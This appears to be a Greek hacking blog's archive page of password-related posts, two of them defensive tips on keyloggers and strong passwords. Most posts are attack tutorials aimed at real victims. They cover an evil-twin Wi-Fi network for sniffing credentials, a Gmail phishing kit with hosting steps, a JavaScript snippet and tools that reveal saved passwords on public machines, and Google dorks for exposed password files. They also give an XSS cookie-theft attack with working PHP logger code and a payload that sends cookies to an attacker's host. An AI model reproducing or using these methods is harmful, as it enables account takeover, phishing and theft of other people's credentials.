Αρχείο για κωδικοί

Πώς θα ξεγελάσετε τα keylogger

Posted in Ασφάλεια with tags , , on Μαρτίου 12, 2010 by netbiosX

Αν βρισκόσαστε σε κάποιο δημόσιο υπολογιστή (net cafe,πανεπιστημίου,δουλειάς κτλ) και δεν είστε σίγουροι για το πόσο καθαρός μπορεί να είναι ο υπολογιστής τότε είναι προτιμότερο προτού βάλετε τον οποιονδήποτε κωδικό σας να πάρετε κάποιες προφυλάξεις.

Ο λόγος είναι ο εξής:επειδή πρόκειται για υπολογιστές που έχει πρόσβαση πολύς κόσμος,ο καθένας θα μπορούσε να έχει εγκαταστήσει κάποιο keylogger με σκοπό την ανακάλυψη password.Εμπιστεύεστε το pin της πιστωτικής σας κάρτας στον καθένα?Γιατί να κάνετε λοιπόν το ίδιο και με τους κωδικούς σας?

1 Τρόπος  

Κάθε φορά που θα βρίσκεστε σε κάποια ιστοσελίδα και θα πρέπει να πληκτρολογήσετε έναν κωδικό μην τον πληκτρολογείτε απευθείας.Για παράδειγμα εάν ο κωδικός σας έχει την ονομασία Windows πληκτρολογήστε πρώτα το NDOW,μετά μετακινήστε τον κέρσορα στην αρχή του πεδίου του password χρησιμοποιώντας το ποντίκι μόνο (και όχι τα βελάκια) και πληκτρολογήστε το WI και τέλος μετακινήστε πάλι χρησιμοποιώντας μόνο το ποντίκι τον κέρσορα στο τέλος και πληκτρολογήστε το S.Με αυτόν τον τρόπο το keylogger θα καταγράψει το password σαν ndowwis και όχι σαν Windows.

2 Τρόπος

Η χρησιμοποίηση των virtual keyboard όπως το safekeys ή ακόμα και το πληκτρολόγιο οθόνης των Windows (Έναρξη—>Προγράμματα—>Βοηθήματα—>Διευκόλυνση πρόσβασης—>Πληκτρολόγιο οθόνης) μπορούν να ξεγελάσουν έναν keylogger.

3 Τρόπος

Οι portable browser όπως firefox,chrome και opera είναι ακόμα μία λύση για την αντιμετώπιση των keylogger.Μπορούμε για παράδειγμα να τους τρέξουμε από το usb μας πρώτα καθώς βρισκόμαστε σε κάποιο ασφαλές μηχάνημα που ξέρουμε ότι σίγουρα δεν τρέχει κάποιον ιό,να μπούμε στις ιστοσελίδες που θέλουμε και να βάλουμε τους κωδικούς μας έχοντας πάντα τσεκαρισμένη την επιλογή «remember me«.Με αυτόν τον τρόπο όταν θα βρεθούμε σε κάποιον υπολογιστή που δεν γνωρίζουμε τι τρέχει από πίσω,δεν θα χρειαστεί να πληκτρολογήσουμε κανέναν κωδικό αφού όλα τα password μας θα είναι αποθηκευμένα ήδη στο usb μας και ο browser θα τα τραβήξει από εκεί.

Φυσικά κανένας από τους παραπάνω τρόπους δεν εγγυάται 100% προστασία καθώς πολλά εξαρτώνται και από τον τύπο του keylogger αλλά σίγουρα είναι κάποια μέτρα προστασίας των κωδικών μας που ισχύουν κατά γενικό κανόνα. 

Δημιουργία ψεύτικου δικτύου για εύρεση κωδικών

Posted in Χάκινγκ with tags , , , , , on Μαρτίου 11, 2010 by netbiosX

Όλοι οι χρήστες έχουν την τάση εφόσον βρίσκουν κάποιο ασύρματο δίκτυο να προσπαθούν να συνδεθούν προκειμένου να εκμεταλευτούν την σύνδεση για να διαβάσουν τα email τους,να μπούνε στο facebook,να μιλήσουν MSN κτλ.Εμείς μπορούμε να εκμεταλευτούμε αυτήν την τάση προς ώφελο μας  φυσικά και να δημιουργήσουμε ένα ψεύτικο δίκτυο (που θα φαίνεται όμως σαν αληθινό για τους απέξω) για να ανακαλύψουμε κωδικούς και διάφορες άλλες πληροφορίες.

Τι θα χρειαστούμε?

  • Ένα laptop
  • Μία σύνδεση στο Internet ασύρματη (κατά προτίμηση 3G)
  • Το wireshark

Δημιουργία του δικτύου

Το πρώτο πράγμα που θα πρέπει να κοιτάξουμε είναι να επιβεβαιώσουμε ότι η ασύρματη κάρτα δικτύου μας υποστηρίζει την δημιουργία ad-hoc δικτύων.Εφόσον το δούμε αυτό δημιουργούμε ένα νέο δίκτυο ad-hoc με την ονομασία linksys διότι τα linksys είναι από τα router που χρησιμοποιούνται συνήθως και είναι πολύ πιθανό να βρίσκεται στην λίστα της ασύρματης τους κάρτας με τα δίκτυα που θα συνδέονται αυτόματα.Το ad-hoc το επιλέγουμε γιατί οι υπόλοιποι υπολογιστές που θα συνδεθούν στο δίκτυο θα συνδεθούν μέσω του υπολογιστή μας.Δηλαδή ο υπολογιστής μας θα είναι φαινομενικά για αυτούς ο router που όμως στην πραγματικότητα δεν θα υπάρχει.

Αφού δημιουργήσαμε το δίκτυο ενεργοποιούμε από τις ιδιότητες της νέας σύνδεσης του δικτύου μας το ICS (Internet Connection Sharing).Ο λόγος που θα το κάνουμε αυτό είναι για να έχουν πρόσβαση στο Internet όλοι όσοι συνδεθούν στο δίκτυο μας.

Αν βρισκόμαστε με το laptop μας σε κάποια περιοχή με πολύ κόσμο όπως κάποιο mall,τότε είναι πολύ πιθανό αρκετοί χρήστες να αρχίσουν να συνδέονται αφού συνηθώς πολλοί άνθρωποι ψάχνουν για δίκτυα είτε με τα netbook τους,είτε με τα κινητά τους τηλέφωνα προκειμένου να τσεκάρουν τα email τους κτλ.Δεδομένου ότι το δικό μας δίκτυο θα είναι και ανοικτό ακόμα και αν δεν βρίσκεται στην auto connect λίστα της κάρτας τους είναι πολύ πιθανό κάποιοι να το προτιμήσουν.

Εύρεση των κωδικών

Τώρα που έχουμε κάποια άτομα συνδεδεμένα στο δίκτυο μας θα πρέπει να αρχίσουμε να ελέγχουμε το τι κάνουν με την σύνδεση μας.Γι’αυτό θα χρειαστούμε το wireshark το οποίο είναι ουσιαστικά ένα sniffer και θα ελέγχει όλα τα πακέτα που θα περνάνε από το δίκτυο μας και κατά συνέπεια και όλα τα passwords που θα εισαχθούν σε ιστοσελίδες.Το ρυθμίζουμε ώστε να κάνει capture το interface (δηλαδή την κάρτα δικτύου) που χρησιμοποιούμε για να διαμοιράσουμε το Internet και το αφήνουμε να καταγράφει όλη την κίνηση του δικτύου και κατά συνέπεια και τους κωδικούς σε περίπτωση που κάποιος χρήστης του δικτύου τους εισάγει σε κάποια ιστοσελίδα.

Πρακτικά δεν έχουμε να κάνουμε κάτι άλλο απλά να το αφήσουμε για κάποια ώρα το wireshark και μετά να αναλύσουμε τα πακέτα για να  εντοπίσουμε τα passwords.Η λογική πίσω από αυτήν την τεχνική είναι να παίξουμε με την μνήμη των laptop/netbook και λοιπών gadget που όλο και σε κάποιο linksys δίκτυο θα έχουν συνδεθεί στο παρελθόν και έτσι να συνδεθούν αυτόματα πάνω σε μας αλλά και το γεγονός ότι θα πρόκειται για ένα ανοικτό δίκτυο σίγουρα θα προσελκύσει και άλλους επίδοξους χρήστες.

Βρίσκοντας κωδικούς Gmail με την μέθοδο Phishing

Posted in Χάκινγκ with tags , , , , on Φεβρουαρίου 21, 2010 by netbiosX

Μία από τις πιο αποδοτικές μεθόδους για να χακάρουμε κάποιον λογαριασμό είναι η μέθοδος του Phishing.Ο λόγος είναι ότι αν το θύμα μας πιστέψει ότι η σελίδα στην οποία θα βάλει τον κωδικό του είναι η αυθεντική τότε εμείς άμεσα θα έχουμε τον κωδικό του χωρίς να προσπαθούμε για μέρες να το σπάσουμε με άλλες μεθόδους.

Για να βρούμε λοιπόν κάποιον κωδικό του Gmail με την μέθοδο του phishing αρκεί να κάνουμε τα παρακάτω:

1)Κατεβάζουμε την ψεύτικη σελίδα του Gmail και κάνουμε εξαγωγή τα περιεχόμενα του σε έναν φάκελο

Ψεύτικη Gmail σελίδα:

http://www.filefactory.com/file/b03d3g4/n/GmailFakepagedatalibrary.wordpress.com.rar

2)Δημιουργούμε έναν free λογαριασμό σε κάποιο από τα παρακάτω site:

 www.t35.com

www.ripway.com

www.110mb.com

3)Ανεβάζουμε σε όποιο από τα παραπάνω site έχουμε κάνει λογαριασμό όλα τα αρχεία που έχουν γίνει εξαγωγή (βήμα 1).Για το παράδειγμα μας θα επιλέξουμε την ιστοσελίδα www.t35.com

4)Ανοίγουμε την ψεύτικη σελίδα του Gmail και βάζουμε κάποιο ψεύτικο username και password για να δούμε ότι όντως λειτουργεί.Η ψεύτικη σελίδα μας θα βρίσκεται στο παρακάτω link:

http://onomatousitesas.t35.com/Gmail.htm

5)Ένα αρχείο με τον κωδικό που έχει εισαχθεί θα δημιουργηθεί στον ίδιο φάκελο και θα μπορείτε να το δείτε στο παρακάτω link:

http://onomatousitesas.t35.com/GmailPasswords.htm

Πλέον είστε έτοιμοι να βρείτε κωδικούς λογαριασμών gmail αρκεί να διαμοιράσετε το ψεύτικο site που θα μοιάζει με το gmail έξυπνα ούτως ώστε να ψάρεψετε όσους περισσότερους λογαριασμούς μπορείτε.

Υποσημείωση:

Αυτό το άρθρο είναι για εκπαιδευτικούς σκοπούς και μόνο και η datalibrary δεν φέρει καμία ευθύνη για το πως θα χρησιμοποιήσετε τα αρχεία που θα κατεβάσετε.

Πώς θα σπάσουμε τα password πίσω από τα ****

Posted in Χάκινγκ with tags , , on Φεβρουαρίου 19, 2010 by netbiosX

Αν βρισκόμαστε σε κάποιον δημόσιο υπολογιστή (σχολείο,πανεπιστήμιο,δουλειά κτλ.) είναι πολύ πιθανό να βρούμε κάποιες ιστοσελίδες στις οποίες κάποιος χρήστης νωρίτερα να έχει κάνει login και ο browser να έχει κρατήσει τα στοιχεία του λογαριασμού του.Όμως ακόμα και αν γνωρίζουμε το όνομα του account πως θα δούμε τι κρύβεται πίσω από τα **** του κωδικού του?

Μέθοδος 1

Το μόνο που θα πρέπει να κάνουμε είναι να αντιγράψουμε τον παρακάτω κώδικα στην μπάρα διευθύνσεων του browser μας και ενώ βρισκόμαστε στην ιστοσελίδα με την login φόρμα και με το password σε μορφή ****

Κώδικας:

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ + g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s=»;if (ej.type==’password’){s=ej.value;if (s!=»){prompt(‘Password found ‘, s)}else{alert(‘Password is blank’)}return true;}}

Το script σε .txt —-> http://uploading.com/files/8b1f3cab/script.txt/

Εικόνα:

Αποκάλυψη κωδικών πίσω από τα ****

Μέθοδος 2

Ένας άλλος τρόπος είναι να κατεβάσουμε το πρόγραμμα Asterisk Key και να το τρέξουμε.Όταν θα βρισκόμαστε στην ιστοσελίδα με το login και ενώ υπάρχει ήδη το password στην φόρμα με την μορφή **** πατάμε στο μενού Show Internet Explorer Passwords

Download: Asterisk Key

Μέθοδος 3

Χρησιμοποιώντας την εφαρμογή SC-PassUnleash.Η εφαρμογή αυτήν δουλεύει μόνο σε συγκεκριμένους FTP και Email Clients αλλά μπορεί να μας φανεί χρήσιμη σε περίπτωση που θέλουμε να βρούμε το email password κάποιου που είναι αποθηκευμένο σε κάποιο client π.χ Outlook.

Εικόνα 2:

Download: SC-PassUnleash

Υποσημείωση:

Το Javascript έχει ανεβεί σε μορφή .txt για να μην υπάρχει πρόβλημα με τον τρόπο που διαχειρίζεται τα «» η wordpress.

Βρίσκοντας ευάλωτες ιστοσελίδες με το Google

Posted in Χάκινγκ with tags , , on Αύγουστος 13, 2009 by netbiosX

Παλαιότερα όταν κάποιος έψαχνε στην μηχανή αναζήτησης Google με συγκεκριμένα queries αυτήν στα αποτελέσματα της μπορούσε να εμφανίσει σημαντικές πληροφορίες όπως passwords από Admins,mail passwords κτλ.Τα τελευταία χρόνια όμως έχουν σταματήσει να εμφανίζεις οι περισσότερες »καλές» πληροφορίες για λόγους ασφαλείας κυριώς επειδή γίναν γνωστά όλα αυτά τα queries στο ευρύ κοινό.

Ωστόσο υπάρχει ακόμα περίπτωση να βρούμε στα αποτελέσματα του Google κάποιους κωδικούς,username κτλ.Τα queries που θα πρέπει να δώσουμε στην αναζήτηση του Google για να βρούμε τα περιεχόμενα φακέλων όπως admin,password,mail κτλ. είναι τα ακόλουθα:

«index of /admin»

«index of /password»

«index of /mail»

«index of /»+passwd

«index of /» password.txt

Επίσης μπορούμε να δοκιμάσουμε και να ψάξουμε για password hints προκειμένου να έχουμε κάποια παραπάνω στοιχεία για να σπάσουμε κάποιον κωδικό.Οι λέξεις κλειδιά είναι οι παρακάτω:

password hint

password hint -email

show password hint -email

filetype:htaccess user

Φυσικά όπως αναφέραμε και πιο πάνω είναι πλέον πολύ δύσκολο να εντοπίσουμε πάρα πολλά password αλλά έστω και για την μία φορά που θα βρούμε κάτι αξίζει η προσπάθεια.

Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Posted in Χάκινγκ with tags , , , on Αύγουστος 7, 2009 by netbiosX

Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.

Ποιά εργαλεία θα χρειαστούμε?

Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:

  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable

Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:

www.000webhost.com

http://www.free-webhosts.com/free-php-webhosting.php

Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:

<head>
<meta http-equiv=»Content-Language» content=»it»>
<title>Cookies Stealther</title>
</head>

<body bgcolor=»#C0C0C0″>

<p align=»center»><font color=»#FF0000″>COOKIES STEALTHER</font></p>
<p align=»center»><font face=»Arial» color=»#FF0000″>By R00T[ATI]</font></p>
<p align=»left»>&nbsp;</p>

</body>

και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:

<?php

$ip = $_SERVER[‘REMOTE_ADDR’];
$referer = $_SERVER[‘HTTP_REFERER’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];

$data = $_GET[c];

$time = date(«Y-m-d G:i:s A»);
$text = «<br><br>».$time.» = «.$ip.»<br><br>User Agent: «.$agent.»<br>Referer:  «.$referer.»<br>Session: «.$data.»<br><br><br>»;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(«Location:
http://www.google.com«);

?>

Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.

Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=»http://www.example-of-hosting/documents.php?c=»+document.cookie;</script>

Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php

Επιλέγοντας δυνατούς κωδικούς

Posted in Ασφάλεια with tags , on Αύγουστος 3, 2009 by netbiosX

Πολλοί χρήστες επειδή θεωρούν ότι θα είναι δύσκολο να θυμηθούν τους κωδικούς τους επιλέγουν κάποιες εύκολες λέξεις,ημερομηνίες ή ακόμα χειρότερα και το ίδιο το όνομα τους!

Κάτι επίσης πολύ συνηθισμένο είναι η επιλογή του ίδιου κωδικού για πολλούς λογαριασμούς (accounts).Αν όμως κάποιος χάκερ ανακαλύψει τον κωδικό τότε μπορεί πολύ εύκολα να αποκτήσει πρόσβαση και σε όσους λογαριασμούς έχουν το ίδιο password.

Είναι σημαντικό λοιπόν να επιλέγουμε δυνατούς κωδικούς.Αλλά τι κάνει έναν κωδικό δυνατό?Το από πόσους χαρακτήρες αποτελείται είναι ένας παράγοντας.Όσο μεγαλύτερο μήκος έχει ένας κωδικός τόσο δυσκολότερο θα είναι για έναν χάκερ να τον σπάσει.

Ένας άλλος παράγοντας για να είναι ένας κωδικός δυνατός είναι και η χρησιμοποίηση διαφορετικών χαρακτήρων.Βάζοντας στον κωδικό μας χαρακτήρες όπως %,#,$ κτλ κάνουμε τον κωδικό μας αρκετά δυνατό.Ακόμα και αν κάποιος χρησιμοποιήσει κάποια τεχνική για να σπάσει τον κωδικό μας όπως dictionary ή brute force έχοντας τέτοιου είδους χαρακτήρες στον κωδικό μας θα είναι πάρα πολύ δύσκολο,σχεδόν αδύνατο να σπάσει ο κωδικός μας.

Ένα άλλο ζήτημα είναι η χρησιμοποιήση μικρών ή κεφαλαίων γραμμάτων στον κωδικό.Για παράδειγμα ο κωδικός test είναι διαφορετικός από τον κωδικό tESt.Και σίγουρα κάποιος που θα προσπαθήσει να σπάσει αυτό το password θα είναι δύσκολο να σκεφτεί και τον παράγοντα πεζών η κεφαλαιών γραμμάτων.

Επιπρόσθετα όταν έχουμε να επιλέξουμε την φράση κλειδί για τον κωδικό μας θα πρέπει να αποφεύγουμε να βάζουμε εύκολες λέξεις.Ένας τρόπος είναι η χρησιμοποιήση λέξεων που θα περιέχουν και αριθμούς.Για παράδειγμα ο κωδικός elite μπορεί να γίνει l33t.Με αυτήν την μέθοδο μπορούμε να έχουμε και κάποια εύκολη λέξη σαν φράση κλειδί που να την θυμόμαστε αλλά και να είναι και δύσκολη και για τον οποιονδήποτε θελήσει να την σπάσει.

Σε περίπτωση που δεν είστε σίγουροι για το πως να χρησιμοποιήσετε την l33t γραφή μπορείτε να επισκεφτείτε την παρακάτω ιστοσελίδα η οποία μπορεί να μετατρέψει οποιαδήποτε λέξη σε μορφή l33t.

http://www.kfdev.com/development/javascript/leettrans.htm

 Τέλος αν δυσκολεύεστε να βρείτε ένα καλό password μόνοι σας υπάρχουν πολλά διαθέσιμα password generators στο Internet για αυτήν την δουλειά.Ένα αρκετά καλό είναι αυτό που θα βρείτε στην παρακάτω διεύθυνση:

http://www.pctools.com/guides/password/

Η συγκεκριμένη σελίδα σας δίνει την δυνατότητα να επιλέξετε το μήκος του κωδικού που θέλετε να παράγει,τι χαρακτήρες θα θέλατε να έχει και επίσης μπορείτε να δημιουργήσετε έως και 50 κωδικούς σε μία φορά για να επιλέξετε τον καταλληλότερο για εσάς.

Ακολουθώντας τις παραπάνω μεθόδους μπορούμε να έχουμε δυνατότερους κωδικούς και να ελαχιστοποιήσουμε την πιθανότητα κάποιος να βρει τους κωδικούς μας.